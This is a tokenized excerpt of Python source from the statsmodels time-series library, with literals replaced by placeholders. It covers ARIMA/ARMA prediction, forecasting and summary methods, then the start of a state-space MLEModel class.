, self ) . fit ( start_params , trend , <EOL> method , transparams , solver , <EOL> maxiter , full_output , disp , <EOL> callback , ** kwargs ) <EOL> normalized_cov_params = None <EOL> arima_fit = ARIMAResults ( self , mlefit . _results . params , <EOL> normalized_cov_params ) <EOL> arima_fit . k_diff = self . k_diff <EOL> arima_fit . mle_retvals = mlefit . mle_retvals <EOL> arima_fit . mle_settings = mlefit . mle_settings <EOL> return ARIMAResultsWrapper ( arima_fit ) <EOL> def predict ( self , params , start = None , end = None , exog = None , typ = '<STR_LIT>' , <EOL> dynamic = False ) : <EOL> if isinstance ( start , ( string_types , datetime ) ) : <EOL> start = _index_date ( start , self . data . dates ) <EOL> if typ == '<STR_LIT>' : <EOL> if not dynamic or ( start != self . k_ar + self . k_diff and <EOL> start is not None ) : <EOL> return super ( ARIMA , self ) . predict ( params , start , end , exog , <EOL> dynamic ) <EOL> else : <EOL> q = self . k_ma <EOL> self . k_ma = <NUM_LIT:0> <EOL> predictedvalues = super ( ARIMA , self ) . predict ( params , start , <EOL> end , exog , <EOL> dynamic ) <EOL> self . k_ma = q <EOL> return predictedvalues <EOL> elif typ == '<STR_LIT>' : <EOL> endog = self . data . endog <EOL> if not dynamic : <EOL> predict = super ( ARIMA , self ) . predict ( params , start , end , exog , <EOL> dynamic ) <EOL> start = self . _get_predict_start ( start , dynamic ) <EOL> end , out_of_sample = self . _get_predict_end ( end ) <EOL> d = self . k_diff <EOL> if '<STR_LIT>' in self . method : <EOL> start += d - <NUM_LIT:1> <EOL> end += d - <NUM_LIT:1> <EOL> if out_of_sample : <EOL> fv = predict [ : - out_of_sample ] + endog [ start : end + <NUM_LIT:1> ] <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> levels = unintegrate_levels ( endog [ - d : ] , d ) <EOL> fv = np . r_ [ fv , <EOL> unintegrate ( predict [ - out_of_sample : ] , <EOL> levels ) [ d : ] ] <EOL> else : <EOL> fv = predict + endog [ start : end + <NUM_LIT:1> ] <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> else : <EOL> k_ar = self . k_ar <EOL> if out_of_sample : <EOL> fv = ( predict [ : - out_of_sample ] + <EOL> endog [ max ( start , self . k_ar - <NUM_LIT:1> ) : end + k_ar + <NUM_LIT:1> ] ) <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> levels = unintegrate_levels ( endog [ - d : ] , d ) <EOL> fv = np . r_ [ fv , <EOL> unintegrate ( predict [ - out_of_sample : ] , <EOL> levels ) [ d : ] ] <EOL> else : <EOL> fv = predict + endog [ max ( start , k_ar ) : end + k_ar + <NUM_LIT:1> ] <EOL> if d == <NUM_LIT:2> : <EOL> fv += np . diff ( endog [ start - <NUM_LIT:1> : end + <NUM_LIT:1> ] ) <EOL> else : <EOL> if start == self . k_ar + self . k_diff or start is None : <EOL> p = self . k_ar <EOL> q = self . k_ma <EOL> k_exog = self . k_exog <EOL> k_trend = self . k_trend <EOL> k_diff = self . k_diff <EOL> ( trendparam , exparams , <EOL> arparams , maparams ) = _unpack_params ( params , ( p , q ) , <EOL> k_trend , <EOL> k_exog , <EOL> reverse = True ) <EOL> self . k_ma = <NUM_LIT:0> <EOL> predict = super ( ARIMA , self ) . predict ( params , start , end , <EOL> exog , dynamic ) <EOL> if not start : <EOL> start = self . _get_predict_start ( start , dynamic ) <EOL> start += k_diff <EOL> self . k_ma = q <EOL> return endog [ start - <NUM_LIT:1> ] + np . cumsum ( predict ) <EOL> else : <EOL> predict = super ( ARIMA , self ) . predict ( params , start , end , <EOL> exog , dynamic ) <EOL> return endog [ start - <NUM_LIT:1> ] + np . cumsum ( predict ) <EOL> return fv <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % typ ) <EOL> predict . __doc__ = _arima_predict <EOL> class ARMAResults ( tsbase . TimeSeriesModelResults ) : <EOL> """<STR_LIT>""" <EOL> _cache = { } <EOL> def __init__ ( self , model , params , normalized_cov_params = None , scale = <NUM_LIT:1.> ) : <EOL> super ( ARMAResults , self ) . __init__ ( model , params , normalized_cov_params , <EOL> scale ) <EOL> self . sigma2 = model . sigma2 <EOL> nobs = model . nobs <EOL> self . nobs = nobs <EOL> k_exog = model . k_exog <EOL> self . k_exog = k_exog <EOL> k_trend = model . k_trend <EOL> self . k_trend = k_trend <EOL> k_ar = model . k_ar <EOL> self . k_ar = k_ar <EOL> self . n_totobs = len ( model . endog ) <EOL> k_ma = model . k_ma <EOL> self . k_ma = k_ma <EOL> df_model = k_exog + k_trend + k_ar + k_ma <EOL> self . _ic_df_model = df_model + <NUM_LIT:1> <EOL> self . df_model = df_model <EOL> self . df_resid = self . nobs - df_model <EOL> self . _cache = resettable_cache ( ) <EOL> @ cache_readonly <EOL> def arroots ( self ) : <EOL> return np . roots ( np . r_ [ <NUM_LIT:1> , - self . arparams ] ) ** - <NUM_LIT:1> <EOL> @ cache_readonly <EOL> def maroots ( self ) : <EOL> return np . roots ( np . r_ [ <NUM_LIT:1> , self . maparams ] ) ** - <NUM_LIT:1> <EOL> @ cache_readonly <EOL> def arfreq ( self ) : <EOL> r"""<STR_LIT>""" <EOL> z = self . arroots <EOL> if not z . size : <EOL> return <EOL> return np . arctan2 ( z . imag , z . real ) / ( <NUM_LIT:2> * pi ) <EOL> @ cache_readonly <EOL> def mafreq ( self ) : <EOL> r"""<STR_LIT>""" <EOL> z = self . maroots <EOL> if not z . size : <EOL> return <EOL> return np . arctan2 ( z . imag , z . real ) / ( <NUM_LIT:2> * pi ) <EOL> @ cache_readonly <EOL> def arparams ( self ) : <EOL> k = self . k_exog + self . k_trend <EOL> return self . params [ k : k + self . k_ar ] <EOL> @ cache_readonly <EOL> def maparams ( self ) : <EOL> k = self . k_exog + self . k_trend <EOL> k_ar = self . k_ar <EOL> return self . params [ k + k_ar : ] <EOL> @ cache_readonly <EOL> def llf ( self ) : <EOL> return self . model . loglike ( self . params ) <EOL> @ cache_readonly <EOL> def bse ( self ) : <EOL> params = self . params <EOL> hess = self . model . hessian ( params ) <EOL> if len ( params ) == <NUM_LIT:1> : <EOL> return np . sqrt ( - <NUM_LIT:1.> / hess [ <NUM_LIT:0> ] ) <EOL> return np . sqrt ( np . diag ( - inv ( hess ) ) ) <EOL> def cov_params ( self ) : <EOL> params = self . params <EOL> hess = self . model . hessian ( params ) <EOL> return - inv ( hess ) <EOL> @ cache_readonly <EOL> def aic ( self ) : <EOL> return - <NUM_LIT:2> * self . llf + <NUM_LIT:2> * self . _ic_df_model <EOL> @ cache_readonly <EOL> def bic ( self ) : <EOL> nobs = self . nobs <EOL> return - <NUM_LIT:2> * self . llf + np . log ( nobs ) * self . _ic_df_model <EOL> @ cache_readonly <EOL> def hqic ( self ) : <EOL> nobs = self . nobs <EOL> return - <NUM_LIT:2> * self . llf + <NUM_LIT:2> * np . log ( np . log ( nobs ) ) * self . _ic_df_model <EOL> @ cache_readonly <EOL> def fittedvalues ( self ) : <EOL> model = self . model <EOL> endog = model . endog . copy ( ) <EOL> k_ar = self . k_ar <EOL> exog = model . exog <EOL> if exog is not None : <EOL> if model . method == "<STR_LIT>" and k_ar > <NUM_LIT:0> : <EOL> exog = exog [ k_ar : ] <EOL> if model . method == "<STR_LIT>" and k_ar > <NUM_LIT:0> : <EOL> endog = endog [ k_ar : ] <EOL> fv = endog - self . resid <EOL> return fv <EOL> @ cache_readonly <EOL> def resid ( self ) : <EOL> return self . model . geterrors ( self . params ) <EOL> @ cache_readonly <EOL> def pvalues ( self ) : <EOL> df_resid = self . df_resid <EOL> return t . sf ( np . abs ( self . tvalues ) , df_resid ) * <NUM_LIT:2> <EOL> def predict ( self , start = None , end = None , exog = None , dynamic = False ) : <EOL> return self . model . predict ( self . params , start , end , exog , dynamic ) <EOL> predict . __doc__ = _arma_results_predict <EOL> def _forecast_error ( self , steps ) : <EOL> sigma2 = self . sigma2 <EOL> ma_rep = arma2ma ( np . r_ [ <NUM_LIT:1> , - self . arparams ] , <EOL> np . r_ [ <NUM_LIT:1> , self . maparams ] , nobs = steps ) <EOL> fcasterr = np . sqrt ( sigma2 * np . cumsum ( ma_rep ** <NUM_LIT:2> ) ) <EOL> return fcasterr <EOL> def _forecast_conf_int ( self , forecast , fcasterr , alpha ) : <EOL> const = norm . ppf ( <NUM_LIT:1> - alpha / <NUM_LIT> ) <EOL> conf_int = np . c_ [ forecast - const * fcasterr , <EOL> forecast + const * fcasterr ] <EOL> return conf_int <EOL> def forecast ( self , steps = <NUM_LIT:1> , exog = None , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if exog is not None : <EOL> exog = np . asarray ( exog ) <EOL> if self . k_exog == <NUM_LIT:1> and exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> elif exog . ndim == <NUM_LIT:1> : <EOL> if len ( exog ) != self . k_exog : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> exog = exog [ None , : ] <EOL> if exog . shape [ <NUM_LIT:0> ] != steps : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . k_ar > <NUM_LIT:0> : <EOL> exog = np . vstack ( ( self . model . exog [ - self . k_ar : , self . k_trend : ] , <EOL> exog ) ) <EOL> forecast = _arma_predict_out_of_sample ( self . params , <EOL> steps , self . resid , self . k_ar , <EOL> self . k_ma , self . k_trend , <EOL> self . k_exog , self . model . endog , <EOL> exog , method = self . model . method ) <EOL> fcasterr = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast , fcasterr , alpha ) <EOL> return forecast , fcasterr , conf_int <EOL> def summary ( self , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> from statsmodels . iolib . summary import Summary <EOL> model = self . model <EOL> title = model . __class__ . __name__ + '<STR_LIT>' <EOL> method = model . method <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if '<STR_LIT>' in method : <EOL> start = k_diff <EOL> else : <EOL> start = k_diff + self . k_ar <EOL> if self . data . dates is not None : <EOL> dates = self . data . dates <EOL> sample = [ dates [ start ] . strftime ( '<STR_LIT>' ) ] <EOL> sample += [ '<STR_LIT>' + dates [ - <NUM_LIT:1> ] . strftime ( '<STR_LIT>' ) ] <EOL> else : <EOL> sample = str ( start ) + '<STR_LIT>' + str ( len ( self . data . orig_endog ) ) <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> if not k_diff : <EOL> order = str ( ( k_ar , k_ma ) ) <EOL> else : <EOL> order = str ( ( k_ar , k_diff , k_ma ) ) <EOL> top_left = [ ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , [ model . __class__ . __name__ + order ] ) , <EOL> ( '<STR_LIT>' , [ method ] ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:0> ] ] ) , <EOL> ( '<STR_LIT>' , [ sample [ <NUM_LIT:1> ] ] ) <EOL> ] <EOL> top_right = [ <EOL> ( '<STR_LIT>' , [ str ( len ( self . model . endog ) ) ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . llf ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . sigma2 ** <NUM_LIT> ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . aic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . bic ] ) , <EOL> ( '<STR_LIT>' , [ "<STR_LIT>" % self . hqic ] ) ] <EOL> smry = Summary ( ) <EOL> smry . add_table_2cols ( self , gleft = top_left , gright = top_right , <EOL> title = title ) <EOL> smry . add_table_params ( self , alpha = alpha , use_t = False ) <EOL> from statsmodels . iolib . table import SimpleTable <EOL> if k_ma and k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = arstubs + mastubs <EOL> roots = np . r_ [ self . arroots , self . maroots ] <EOL> freq = np . r_ [ self . arfreq , self . mafreq ] <EOL> elif k_ma : <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = mastubs <EOL> roots = self . maroots <EOL> freq = self . mafreq <EOL> elif k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> stubs = arstubs <EOL> roots = self . arroots <EOL> freq = self . arfreq <EOL> else : <EOL> stubs = [ ] <EOL> if len ( stubs ) : <EOL> modulus = np . abs ( roots ) <EOL> data = np . column_stack ( ( roots . real , roots . imag , modulus , freq ) ) <EOL> roots_table = SimpleTable ( data , <EOL> headers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> title = "<STR_LIT>" , <EOL> stubs = stubs , <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> smry . tables . append ( roots_table ) <EOL> return smry <EOL> def summary2 ( self , title = None , alpha = <NUM_LIT> , float_format = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> from pandas import DataFrame <EOL> k_diff = getattr ( self , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> if '<STR_LIT>' in self . model . method : <EOL> start = k_diff <EOL> else : <EOL> start = k_diff + self . k_ar <EOL> if self . data . dates is not None : <EOL> dates = self . data . dates <EOL> sample = [ dates [ start ] . strftime ( '<STR_LIT>' ) ] <EOL> sample += [ dates [ - <NUM_LIT:1> ] . strftime ( '<STR_LIT>' ) ] <EOL> else : <EOL> sample = str ( start ) + '<STR_LIT>' + str ( len ( self . data . orig_endog ) ) <EOL> k_ar , k_ma = self . k_ar , self . k_ma <EOL> if k_ma and k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = arstubs + mastubs <EOL> roots = np . r_ [ self . arroots , self . maroots ] <EOL> freq = np . r_ [ self . arfreq , self . mafreq ] <EOL> elif k_ma : <EOL> mastubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ma + <NUM_LIT:1> ) ] <EOL> stubs = mastubs <EOL> roots = self . maroots <EOL> freq = self . mafreq <EOL> elif k_ar : <EOL> arstubs = [ "<STR_LIT>" % i for i in range ( <NUM_LIT:1> , k_ar + <NUM_LIT:1> ) ] <EOL> stubs = arstubs <EOL> roots = self . arroots <EOL> freq = self . arfreq <EOL> else : <EOL> stubs = [ ] <EOL> if len ( stubs ) : <EOL> modulus = np . abs ( roots ) <EOL> data = np . column_stack ( ( roots . real , roots . imag , modulus , freq ) ) <EOL> data = DataFrame ( data ) <EOL> data . columns = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> data . index = stubs <EOL> from statsmodels . iolib import summary2 <EOL> smry = summary2 . Summary ( ) <EOL> model_info = summary2 . summary_model ( self ) <EOL> model_info [ '<STR_LIT>' ] = self . model . method <EOL> model_info [ '<STR_LIT>' ] = sample [ <NUM_LIT:0> ] <EOL> model_info [ '<STR_LIT:U+0020>' ] = sample [ - <NUM_LIT:1> ] <EOL> model_info [ '<STR_LIT>' ] = "<STR_LIT>" % self . sigma2 ** <NUM_LIT> <EOL> model_info [ '<STR_LIT>' ] = "<STR_LIT>" % self . hqic <EOL> model_info [ '<STR_LIT>' ] = str ( len ( self . model . endog ) ) <EOL> params = summary2 . summary_params ( self ) <EOL> smry . add_dict ( model_info ) <EOL> smry . add_df ( params , float_format = float_format ) <EOL> if len ( stubs ) : <EOL> smry . add_df ( data , float_format = "<STR_LIT>" ) <EOL> smry . add_title ( results = self , title = title ) <EOL> return smry <EOL> def plot_predict ( self , start = None , end = None , exog = None , dynamic = False , <EOL> alpha = <NUM_LIT> , plot_insample = True , ax = None ) : <EOL> from statsmodels . graphics . utils import _import_mpl , create_mpl_ax <EOL> _ = _import_mpl ( ) <EOL> fig , ax = create_mpl_ax ( ax ) <EOL> forecast = self . predict ( start , end , exog , dynamic ) <EOL> start = self . model . _get_predict_start ( start , dynamic = False ) <EOL> end , out_of_sample = self . model . _get_predict_end ( end , dynamic = False ) <EOL> if out_of_sample : <EOL> steps = out_of_sample <EOL> fc_error = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast [ - steps : ] , fc_error , <EOL> alpha ) <EOL> if hasattr ( self . data , "<STR_LIT>" ) : <EOL> from pandas import Series <EOL> forecast = Series ( forecast , index = self . data . predict_dates ) <EOL> ax = forecast . plot ( ax = ax , label = '<STR_LIT>' ) <EOL> else : <EOL> ax . plot ( forecast ) <EOL> x = ax . get_lines ( ) [ - <NUM_LIT:1> ] . get_xdata ( ) <EOL> if out_of_sample : <EOL> label = "<STR_LIT>" . format ( <NUM_LIT:1> - alpha ) <EOL> ax . fill_between ( x [ - out_of_sample : ] , conf_int [ : , <NUM_LIT:0> ] , conf_int [ : , <NUM_LIT:1> ] , <EOL> color = '<STR_LIT>' , alpha = <NUM_LIT> , label = label ) <EOL> if plot_insample : <EOL> ax . plot ( x [ : end + <NUM_LIT:1> - start ] , self . model . endog [ start : end + <NUM_LIT:1> ] , <EOL> label = self . model . endog_names ) <EOL> ax . legend ( loc = '<STR_LIT>' ) <EOL> return fig <EOL> plot_predict . __doc__ = _plot_predict <EOL> class ARMAResultsWrapper ( wrap . ResultsWrapper ) : <EOL> _attrs = { } <EOL> _wrap_attrs = wrap . union_dicts ( tsbase . TimeSeriesResultsWrapper . _wrap_attrs , <EOL> _attrs ) <EOL> _methods = { } <EOL> _wrap_methods = wrap . union_dicts ( tsbase . TimeSeriesResultsWrapper . _wrap_methods , <EOL> _methods ) <EOL> wrap . populate_wrapper ( ARMAResultsWrapper , ARMAResults ) <EOL> class ARIMAResults ( ARMAResults ) : <EOL> def predict ( self , start = None , end = None , exog = None , typ = '<STR_LIT>' , <EOL> dynamic = False ) : <EOL> return self . model . predict ( self . params , start , end , exog , typ , dynamic ) <EOL> predict . __doc__ = _arima_results_predict <EOL> def _forecast_error ( self , steps ) : <EOL> sigma2 = self . sigma2 <EOL> ma_rep = arma2ma ( np . r_ [ <NUM_LIT:1> , - self . arparams ] , <EOL> np . r_ [ <NUM_LIT:1> , self . maparams ] , nobs = steps ) <EOL> fcerr = np . sqrt ( np . cumsum ( cumsum_n ( ma_rep , self . k_diff ) ** <NUM_LIT:2> ) * sigma2 ) <EOL> return fcerr <EOL> def _forecast_conf_int ( self , forecast , fcerr , alpha ) : <EOL> const = norm . ppf ( <NUM_LIT:1> - alpha / <NUM_LIT> ) <EOL> conf_int = np . c_ [ forecast - const * fcerr , forecast + const * fcerr ] <EOL> return conf_int <EOL> def forecast ( self , steps = <NUM_LIT:1> , exog = None , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if exog is not None : <EOL> if self . k_exog == <NUM_LIT:1> and exog . ndim == <NUM_LIT:1> : <EOL> exog = exog [ : , None ] <EOL> if exog . shape [ <NUM_LIT:0> ] != steps : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . k_ar > <NUM_LIT:0> : <EOL> exog = np . vstack ( ( self . model . exog [ - self . k_ar : , self . k_trend : ] , <EOL> exog ) ) <EOL> forecast = _arma_predict_out_of_sample ( self . params , steps , self . resid , <EOL> self . k_ar , self . k_ma , <EOL> self . k_trend , self . k_exog , <EOL> self . model . endog , <EOL> exog , method = self . model . method ) <EOL> d = self . k_diff <EOL> endog = self . model . data . endog [ - d : ] <EOL> forecast = unintegrate ( forecast , unintegrate_levels ( endog , d ) ) [ d : ] <EOL> fcerr = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast , fcerr , alpha ) <EOL> return forecast , fcerr , conf_int <EOL> def plot_predict ( self , start = None , end = None , exog = None , dynamic = False , <EOL> alpha = <NUM_LIT> , plot_insample = True , ax = None ) : <EOL> from statsmodels . graphics . utils import _import_mpl , create_mpl_ax <EOL> _ = _import_mpl ( ) <EOL> fig , ax = create_mpl_ax ( ax ) <EOL> forecast = self . predict ( start , end , exog , '<STR_LIT>' , dynamic ) <EOL> start = self . model . _get_predict_start ( start , dynamic = dynamic ) <EOL> end , out_of_sample = self . model . _get_predict_end ( end , dynamic = dynamic ) <EOL> if out_of_sample : <EOL> steps = out_of_sample <EOL> fc_error = self . _forecast_error ( steps ) <EOL> conf_int = self . _forecast_conf_int ( forecast [ - steps : ] , fc_error , <EOL> alpha ) <EOL> if hasattr ( self . data , "<STR_LIT>" ) : <EOL> from pandas import Series <EOL> forecast = Series ( forecast , index = self . data . predict_dates ) <EOL> ax = forecast . plot ( ax = ax , label = '<STR_LIT>' ) <EOL> else : <EOL> ax . plot ( forecast ) <EOL> x = ax . get_lines ( ) [ - <NUM_LIT:1> ] . get_xdata ( ) <EOL> if out_of_sample : <EOL> label = "<STR_LIT>" . format ( <NUM_LIT:1> - alpha ) <EOL> ax . fill_between ( x [ - out_of_sample : ] , conf_int [ : , <NUM_LIT:0> ] , conf_int [ : , <NUM_LIT:1> ] , <EOL> color = '<STR_LIT>' , alpha = <NUM_LIT> , label = label ) <EOL> if plot_insample : <EOL> import re <EOL> k_diff = self . k_diff <EOL> label = re . sub ( "<STR_LIT>" , "<STR_LIT>" , self . model . endog_names ) <EOL> levels = unintegrate ( self . model . endog , <EOL> self . model . _first_unintegrate ) <EOL> ax . plot ( x [ : end + <NUM_LIT:1> - start ] , <EOL> levels [ start + k_diff : end + k_diff + <NUM_LIT:1> ] , label = label ) <EOL> ax . legend ( loc = '<STR_LIT>' ) <EOL> return fig <EOL> plot_predict . __doc__ = _arima_plot_predict <EOL> class ARIMAResultsWrapper ( ARMAResultsWrapper ) : <EOL> pass <EOL> wrap . populate_wrapper ( ARIMAResultsWrapper , ARIMAResults ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import statsmodels . api as sm <EOL> from statsmodels . tsa . arima_process import arma_generate_sample <EOL> y = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> ] , [ <NUM_LIT:1.> , <NUM_LIT> ] , nsample = <NUM_LIT:1000> ) <EOL> arma = ARMA ( y ) <EOL> res = arma . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> y_arma22 = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma22 = ARMA ( y_arma22 ) <EOL> res22 = arma22 . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> arma22_css = ARMA ( y_arma22 ) <EOL> res22css = arma22_css . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:2> , <NUM_LIT:2> ) , method = '<STR_LIT>' ) <EOL> data = sm . datasets . sunspots . load ( ) <EOL> ar = ARMA ( data . endog ) <EOL> resar = ar . fit ( trend = '<STR_LIT>' , order = ( <NUM_LIT:9> , <NUM_LIT:0> ) ) <EOL> y_arma31 = arma_generate_sample ( [ <NUM_LIT:1> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma31css = ARMA ( y_arma31 ) <EOL> res31css = arma31css . fit ( order = ( <NUM_LIT:3> , <NUM_LIT:1> ) , method = "<STR_LIT>" , trend = "<STR_LIT>" , <EOL> transparams = True ) <EOL> y_arma13 = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> ] , [ <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma13css = ARMA ( y_arma13 ) <EOL> res13css = arma13css . fit ( order = ( <NUM_LIT:1> , <NUM_LIT:3> ) , method = '<STR_LIT>' , trend = '<STR_LIT>' ) <EOL> y_arma41 = arma_generate_sample ( [ <NUM_LIT:1.> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , [ <NUM_LIT:1> , - <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma41css = ARMA ( y_arma41 ) <EOL> res41css = arma41css . fit ( order = ( <NUM_LIT:4> , <NUM_LIT:1> ) , trend = '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> y_arma14 = arma_generate_sample ( [ <NUM_LIT:1> , - <NUM_LIT> ] , [ <NUM_LIT:1.> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> nsample = <NUM_LIT:1000> ) <EOL> arma14css = ARMA ( y_arma14 ) <EOL> res14css = arma14css . fit ( order = ( <NUM_LIT:4> , <NUM_LIT:1> ) , trend = '<STR_LIT>' , method = '<STR_LIT>' ) <EOL> from statsmodels . datasets import webuse <EOL> dta = webuse ( '<STR_LIT>' ) <EOL> wpi = dta [ '<STR_LIT>' ] <EOL> mod = ARIMA ( wpi , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . fit ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import , print_function <EOL> import numpy as np <EOL> import pandas as pd <EOL> from scipy . stats import norm <EOL> from . kalman_smoother import KalmanSmoother , SmootherResults <EOL> from . kalman_filter import ( <EOL> KalmanFilter , FilterResults , PredictionResults , INVERT_UNIVARIATE , SOLVE_LU <EOL> ) <EOL> import statsmodels . tsa . base . tsa_model as tsbase <EOL> import statsmodels . base . wrapper as wrap <EOL> from statsmodels . tools . numdiff import ( <EOL> _get_epsilon , approx_hess_cs , approx_fprime_cs , approx_fprime <EOL> ) <EOL> from statsmodels . tools . decorators import cache_readonly , resettable_cache <EOL> from statsmodels . tools . eval_measures import aic , bic , hqic <EOL> from statsmodels . tools . tools import pinv_extended <EOL> from statsmodels . tools . tools import Bunch <EOL> import statsmodels . genmod . _prediction as pred <EOL> from statsmodels . genmod . families . links import identity <EOL> import warnings <EOL> class MLEModel ( tsbase . TimeSeriesModel ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , endog , k_states , exog = None , dates = None , freq = None , <EOL> ** kwargs ) : <EOL> super ( MLEModel , self ) . __init__ ( endog = endog , exog = exog , <EOL> dates = dates , freq = freq , <EOL> missing = '<STR_LIT:none>' ) <EOL> self . _init_kwargs = kwargs <EOL> self . endog , self . exog = self . prepare_data ( ) <EOL> self . nobs = self . endog . shape [ <NUM_LIT:0> ] <EOL> self . k_states = k_states <EOL> self . initialize_statespace ( ** kwargs ) <EOL> def prepare_data ( self ) : <EOL> """<STR_LIT>""" <EOL> endog = np . array ( self . data . orig_endog , order = '<STR_LIT:C>' ) <EOL> exog = self . data . orig_exog <EOL> if exog is not None : <EOL> exog = np . array ( exog ) <EOL> if endog . ndim == <NUM_LIT:1> : <EOL> endog . shape = ( endog . shape [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> return endog , exog <EOL> def initialize_statespace ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> endog = self . endog . T <EOL> self . ssm = KalmanSmoother ( endog . shape [ <NUM_LIT:0> ] , self . k_states , ** kwargs ) <EOL> self . ssm . bind ( endog ) <EOL> self . k_endog = self . ssm . k_endog <EOL> def __setitem__ ( self , key , value ) : <EOL> return self . ssm . __setitem__ ( key , value ) <EOL> def __getitem__ ( self , key ) : <EOL> return self . ssm . __getitem__ ( key ) <EOL> def set_filter_method ( self , filter_method = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_filter_method ( filter_method , ** kwargs ) <EOL> def set_inversion_method ( self , inversion_method = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_inversion_method ( inversion_method , ** kwargs ) <EOL> def set_stability_method ( self , stability_method = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_stability_method ( stability_method , ** kwargs ) <EOL> def set_conserve_memory ( self , conserve_memory = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_conserve_memory ( conserve_memory , ** kwargs ) <EOL> def set_smoother_output ( self , smoother_output = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . ssm . set_smoother_output ( smoother_output , ** kwargs ) <EOL> def initialize_known ( self , initial_state , initial_state_cov ) : <EOL> self . ssm . initialize_known ( initial_state , initial_state_cov ) <EOL> def initialize_approximate_diffuse ( self , variance = None ) : <EOL> self . ssm . initialize_approximate_diffuse ( variance ) <EOL> def initialize_stationary ( self ) : <EOL> self . ssm . initialize_stationary ( ) <EOL> @ property <EOL> def initialization ( self ) : <EOL> return self . ssm . initialization <EOL> @ property <EOL> def initial_variance ( self ) : <EOL> return self . ssm . initial_variance <EOL> @ initial_variance . setter <EOL> def initial_variance ( self , value ) : <EOL> self . ssm . initial_variance = value <EOL> @ property <EOL> def loglikelihood_burn ( self ) : <EOL> return self . ssm . loglikelihood_burn <EOL> @ loglikelihood_burn . setter <EOL> def 